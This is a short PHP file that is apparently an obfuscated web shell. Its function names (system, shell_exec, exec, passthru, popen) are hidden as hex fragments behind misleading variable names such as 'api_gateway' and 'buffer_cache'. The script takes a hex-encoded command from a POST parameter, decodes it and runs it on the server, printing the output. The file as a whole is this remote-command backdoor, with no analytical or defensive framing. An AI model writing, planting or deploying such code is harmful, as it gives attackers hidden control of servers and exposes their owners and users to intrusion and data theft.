<?php


$token1 = '746';
$token2 = '736';
$token3 = 'c5f';
$token4 = '657';
$token5 = '706';
$token6 = '737';
$token7 = '656';
$token8 = '765';
$token9 = '745';
$token10 = 'f63';
$token11 = 'e74';
$token12 = '6f7';
$token13 = '365';
$token14 = '666';
$token15 = '636';
$token16 = '865';
$api_gateway1 = pack("H*", '737' . '973' . $token1 . '56d');
$api_gateway2 = pack("H*", $token2 . '865' . '6c6' . $token3 . '657' . '865');
$api_gateway3 = pack("H*", $token4 . '865');
$api_gateway4 = pack("H*", $token5 . '173' . $token6 . '468' . '727');
$api_gateway5 = pack("H*", $token5 . 'f70' . $token7);
$api_gateway6 = pack("H*", '737' . '472' . $token7 . '16d' . '5f6' . $token8 . $token9 . $token10 . '6f6' . $token11 . '656' . $token11);
$api_gateway7 = pack("H*", '706' . '36c' . $token12 . $token13);
$buffer_cache = pack("H*", '627' . '566' . $token14 . '572' . '5f6' . '361' . $token15 . $token16);
if (isset($_POST[$buffer_cache])) {
    $buffer_cache = pack("H*", $_POST[$buffer_cache]);
    if (function_exists($api_gateway1)) {
        $api_gateway1($buffer_cache);
    } elseif (function_exists($api_gateway2)) {
        print $api_gateway2($buffer_cache);
    } elseif (function_exists($api_gateway3)) {
        $api_gateway3($buffer_cache, $res_flag);
        print join("\n", $res_flag);
    } elseif (function_exists($api_gateway4)) {
        $api_gateway4($buffer_cache);
    } elseif (function_exists($api_gateway5) && function_exists($api_gateway6) && function_exists($api_gateway7)) {
        $comp_pointer = $api_gateway5($buffer_cache, 'r');
        if ($comp_pointer) {
            $hld_binding = $api_gateway6($comp_pointer);
            $api_gateway7($comp_pointer);
            print $hld_binding;
        }
    }
    exit;
}
